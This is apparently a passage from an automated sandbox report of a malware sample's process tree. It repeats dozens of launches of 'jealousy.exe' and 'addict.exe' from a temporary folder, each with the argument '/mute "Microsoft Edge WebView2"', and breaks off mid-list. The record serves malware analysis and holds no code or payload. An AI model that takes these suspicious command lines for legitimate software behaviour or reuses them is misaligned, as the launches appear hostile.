"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6324

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7884

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8388

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8912

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8760

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9036

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9640

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9312

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3224

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7476

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6236

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7320

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8364

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8764

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9048

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9908

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1648

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:10040

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5048

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:404

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7428

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7432

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7920

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1400

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8340

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9456

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3776

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6336

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9972

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7816

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9476

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7696

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6120

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6940

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8376

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8660

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8688

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8972

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9308

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3500

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9352

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3940

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7360

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8520

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1400

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3292

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1164

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9944

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:10088

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9956

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4056

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6984

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7912

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7092

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6840

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7964

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:556

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9500

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7816

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8716

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:932

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8156

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7404

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7948

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6344

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7004

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8648

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8740

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9376

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7520

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8452

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9488

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9088

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8012

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9380

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7688

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3008

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6236

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8204

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8224

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5980

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8596

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8992

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3204

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9816

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8676

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8052

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9440

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8636

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2216

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9484

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6332

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9392

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9336

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9992

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4172

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7340

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9092

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8872

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6404

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
